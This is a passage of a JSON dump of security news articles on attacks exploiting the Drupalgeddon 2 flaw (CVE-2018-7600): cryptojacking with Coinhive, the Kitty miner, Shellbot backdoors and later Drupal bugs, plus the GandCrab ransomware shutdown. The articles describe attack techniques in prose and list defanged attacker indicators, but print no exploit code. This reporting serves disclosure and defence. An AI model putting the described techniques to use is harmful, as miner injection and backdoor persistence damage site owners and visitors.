Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. \u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. 
However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. [pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6, 7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency 
miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty of examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which uses xmrig to mine the Monero (XMR) cryptocurrency.\n\nBut the attackers are also looking to expand their mining efforts to web 
app visitors using a mining script called me0w.js. They achieve this by adding the malicious JavaScript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used open-source browser-mining software called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 to the server\u2019s disk.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. 
This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6, 7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted are Drupal 6 and the 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MITRE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). 
There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal-specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security-oriented content delivery network services, CloudFlare and Fastly, have rolled out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade, or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer at Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said Drupal is not releasing any of the technical aspects of the vulnerability other than that the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this is a blunt solution to the problem and not fixing the specific vulnerable code. 
But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. 
What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal website, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability [since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting it under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. 
The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal website, they can look for SQL injection vulnerabilities, execute DDoS attacks, distribute phishing email spam, and terminate any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those instances adversaries have targeted systems ideal for planting [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. 
Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organizations are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately, this appears not to have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. 
When using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly, that can lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigate to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack through these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. 
Essentially, in some conditions, content moderation fails to check a user\u2019s access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows an external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 permission to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit it, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users into visiting third-party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 
8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6, 7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T11:46:10", "description": "The GandCrab ransomware group is shutting down, according to posts on the Dark Web.\n\nResearchers David Montenegro and Damian [spotted the announcements](<https://twitter.com/Damian1338B/status/1134723204566700033>) over the weekend.\n\n> Start of GandCrab Ransomware : 28-1-2018 .. \ud83e\udd80\ud83e\udd80\ud83e\udd80 \nClose of GandCrab Ransomware : 1-6-2019 .. 
\u2620\ufe0f\u2620\ufe0f\u2620\ufe0f[@Raj_Samani](<https://twitter.com/Raj_Samani?ref_src=twsrc%5Etfw>) [@ValthekOn](<https://twitter.com/ValthekOn?ref_src=twsrc%5Etfw>) [@John_Fokker](<https://twitter.com/John_Fokker?ref_src=twsrc%5Etfw>) [@hasherezade](<https://twitter.com/hasherezade?ref_src=twsrc%5Etfw>) [@VK_Intel](<https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw>) [@James_inthe_box](<https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw>) [@luca_nagy_](<https://twitter.com/luca_nagy_?ref_src=twsrc%5Etfw>) [@Bitdefender](<https://twitter.com/Bitdefender?ref_src=twsrc%5Etfw>) [@Europol](<https://twitter.com/Europol?ref_src=twsrc%5Etfw>) [@campuscodi](<https://twitter.com/campuscodi?ref_src=twsrc%5Etfw>) [@tamas_boczan](<https://twitter.com/tamas_boczan?ref_src=twsrc%5Etfw>) [@JayTHL](<https://twitter.com/JayTHL?ref_src=twsrc%5Etfw>) [@demonslay335](<https://twitter.com/demonslay335?ref_src=twsrc%5Etfw>) [@struppigel](<https://twitter.com/struppigel?ref_src=twsrc%5Etfw>) [pic.twitter.com/kkrhKUunDX](<https://t.co/kkrhKUunDX>)\n> \n> \u2014 CryptoInsane (@CryptoInsane) [June 1, 2019](<https://twitter.com/CryptoInsane/status/1134727041826377729?ref_src=twsrc%5Etfw>)\n\nNoting that \u201call good things come to an end,\u201d GandCrab\u2019s operators in a posting on the exploit[.]in underground market claim the malware has raked in nearly $2 billion since the ransomware launched in January of last year. That encompasses ransomware-as-a-service (RaaS) earnings as well as $150 million for the operators themselves. 
They said they were averaging $2.5 million per week.\n\nYet, despite all of this success \u2013 and perhaps due to more [GandCrab decryptors](<https://www.nomoreransom.org/en/decryption-tools.html>) popping up to [help businesses combat infections](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) \u2013 the group said that it is suspending their servers, ads and infrastructure.\n\nThe operators also warned, \u201cVictims, if you buy, now. Then your data no one will recover. Keys will be deleted.\u201d\n\nMichael Gillespie, Emsisoft researcher and creator of the ID Ransomware service, told Threatpost: \u201cThe number of GrandCrab submissions to ID Ransomware has been trending downwards for some time. I think they\u2019re doing like the TeslaCrypt devs; getting out while the going is good and sailing away on their yachts. Unfortunately, no-one will ever be able to decrypt unless the criminals release the keys for the more recent variants.\u201d\n\n## GandCrab: A Swiftly Moving Malware\n\nGandCrab is a fairly standard ransomware in that it scans infected Windows systems and any network shares for files to encrypt. It\u2019s recognizable by the \u201c.gdcb\u201d extension that it appends to encrypted files.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/03101107/GrandCrab-Closing-Message.png>)\n\nYet in the 16 months since its debut, it has become [one of the most prolific ransomware strains](<https://threatpost.com/banking-trojans-top-threat-email/141814/>) out there, as GandCrab\u2019s operators have also continued to evolve its code (there are five versions) and [infection vectors](<https://threatpost.com/gandcrabs-rotten-eggs-hatch-ransomware-in-south-korea/136689/>).\n\nThose operators specialized in the RaaS model, according to researchers, and partnering with botnet operators and other affiliate cybercriminals \u2013 which helps account for its widespread virulence. 
It spreads in various ways, including via spam emails, exploit kits, targeted social engineering efforts, fake software downloads and malicious websites; and it was recently spotted as the final payload for [a series of attacks](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) that exploit the recently patched, critical Oracle WebLogic bug, CVE-2019-2725.\n\nSome attackers have customized the code as well; recently for example Bromium [identified](<https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image>) a new PowerShell technique being used to spread GandCrab that uses Excel documents and an image of Super Mario to infect machines. It only attacked Windows computers in Italy, and was coded to not execute if the infection landed in a different geography.\n\n\u201cAnalysis showed PowerShell code launching from malicious Excel spreadsheets, which are freshly rewrapped to avoid detection by signature-based security tools,\u201d Bromium explained in its blog on the campaign, in May. \u201cThe script is then used to download a picture of Super Mario which contains more PowerShell code that ultimately downloads GandCrab ransomware, encrypting files and network assets. By hiding the ransomware within images, it makes it nearly impossible for perimeter detection to work out if there is something malicious within the code.\u201d\n\nDespite their successful 16-month run, GandCrab\u2019s operators are ready to retire, they said.\n\n\u201cWe successfully cashed this money and legalized it in various spheres of white business,\u201d they posted. \u201cWe are leaving for a well-deserved retirement. We have proven that by doing evil deeds, retribution does not come. 
We proved that in a year, you can earn money for a lifetime.\u201d\n", "cvss3": {}, "published": "2019-06-03T14:18:01", "type": "threatpost", "title": "GandCrab Ransomware Shutters Its Operations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-06-03T14:18:01", "id": "THREATPOST:3E82813FD33FCC5937E06B9D667A547A", "href": "https://threatpost.com/gandcrab-ransomware-shutters/145267/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. 
\n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. 
\n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. 
Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere is the guide the Drupal team suggests following [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:49", "description": 